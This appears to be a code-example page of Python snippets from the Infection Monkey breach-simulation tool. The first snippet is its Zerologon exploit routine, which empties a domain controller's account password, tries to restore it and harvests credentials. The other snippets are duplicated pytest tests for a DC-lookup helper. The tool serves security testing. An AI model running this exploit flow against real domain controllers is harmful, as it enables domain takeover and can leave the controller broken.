Exemple #1
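    def _exploit_host(self) -> bool:
        """Check the domain controller at ``self.host`` and, if vulnerable, run the exploit.

        On success the code changes the DC account password to an empty string
        (see the log message below) and then tries to put the original password
        back via ``self.restore_password()``. If the restore fails, the DC is
        left with the changed password and needs manual remediation, so that
        outcome is logged at error level and recorded in
        ``self.exploit_info["password_restored"]``.

        Returns:
            False when the exploit was not attempted; otherwise the result of
            ``self._send_exploit_rpc_login_requests()``.

        NOTE(review): ``get_dc_details()`` is not guarded here. If it can raise
        (for example when no DC name is resolved), the exception propagates to
        the caller; confirm that is intended.
        """
        self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)

        can_exploit, rpc_con = is_exploitable(self)
        if not can_exploit:
            # NOTE(review): rpc_con is not closed on this path; confirm that
            # is_exploitable() never returns an open connection alongside False.
            logger.info(
                "Exploit not attempted. Target is most likely patched, or an error was "
                "encountered.")
            return False

        logger.info(
            "Target vulnerable, changing account password to empty string."
        )

        try:
            # Start exploiting attempts.
            logger.debug("Attempting exploit.")
            _exploited = self._send_exploit_rpc_login_requests(rpc_con)
        finally:
            # Always release the RPC connection, including when the request
            # loop raises, so a failed run does not leave a session open on the DC.
            rpc_con.disconnect()

        if not _exploited:
            logger.info("System was not exploited.")
            return _exploited

        # Restore DC's original password.
        if self.restore_password():
            self.exploit_info["password_restored"] = True
            self.store_extracted_creds_for_exploitation()
            logger.info(
                "System exploited and password restored successfully.")
        else:
            self.exploit_info["password_restored"] = False
            # The DC is still in its modified state here; surface this above
            # info level so operators notice and restore the password by hand.
            logger.error("System exploited but couldn't restore password!")

        return _exploited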
Exemple #2
def test_get_dc_details_no_netbios_names(host, monkeypatch):
    """get_dc_details() must raise when the stubbed NetBIOS lookup has no names."""
    NETBIOS_NAMES = []

    # Swap the real NetBIOS query for a stub built from the (empty) name list,
    # so the lookup result is fully controlled by this test.
    monkeypatch.setattr(
        NetBIOS, "queryIPForName", _get_stub_queryIPForName(NETBIOS_NAMES)
    )

    with pytest.raises(DomainControllerNameFetchError):
        _ip, _name, _handle = get_dc_details(host)
def test_get_dc_details_no_netbios_names(host, monkeypatch):
    """get_dc_details() must raise when the stubbed NetBIOS lookup has no names."""
    # Imported inside the test rather than at module level, as in the original.
    from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details

    NETBIOS_NAMES = []

    # Swap the real NetBIOS query for a stub built from the (empty) name list,
    # so the lookup result is fully controlled by this test.
    monkeypatch.setattr(
        NetBIOS, "queryIPForName", _get_stub_queryIPForName(NETBIOS_NAMES)
    )

    with pytest.raises(DomainControllerNameFetchError):
        _ip, _name, _handle = get_dc_details(host)
Exemple #4
def test_get_dc_details_multiple_netbios_names(host, monkeypatch):
    """With several NetBIOS names stubbed, get_dc_details() must use the first one."""
    NETBIOS_NAMES = ["Name1", "Name2", "Name3"]

    # Swap the real NetBIOS query for a stub built from the name list above,
    # so the lookup result is fully controlled by this test.
    monkeypatch.setattr(
        NetBIOS, "queryIPForName", _get_stub_queryIPForName(NETBIOS_NAMES)
    )

    details = get_dc_details(host)
    resolved_ip, resolved_name, resolved_handle = details

    assert resolved_ip == IP
    assert resolved_name == NETBIOS_NAMES[0]
    # The handle is the chosen name prefixed with two backslashes.
    assert resolved_handle == f"\\\\{NETBIOS_NAMES[0]}"
def test_get_dc_details_multiple_netbios_names(host, monkeypatch):
    """With several NetBIOS names stubbed, get_dc_details() must use the first one."""
    # Imported inside the test rather than at module level, as in the original.
    from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details

    NETBIOS_NAMES = ["Name1", "Name2", "Name3"]

    # Swap the real NetBIOS query for a stub built from the name list above,
    # so the lookup result is fully controlled by this test.
    monkeypatch.setattr(
        NetBIOS, "queryIPForName", _get_stub_queryIPForName(NETBIOS_NAMES)
    )

    details = get_dc_details(host)
    resolved_ip, resolved_name, resolved_handle = details

    assert resolved_ip == IP
    assert resolved_name == NETBIOS_NAMES[0]
    # The handle is the chosen name prefixed with two backslashes.
    assert resolved_handle == f"\\\\{NETBIOS_NAMES[0]}"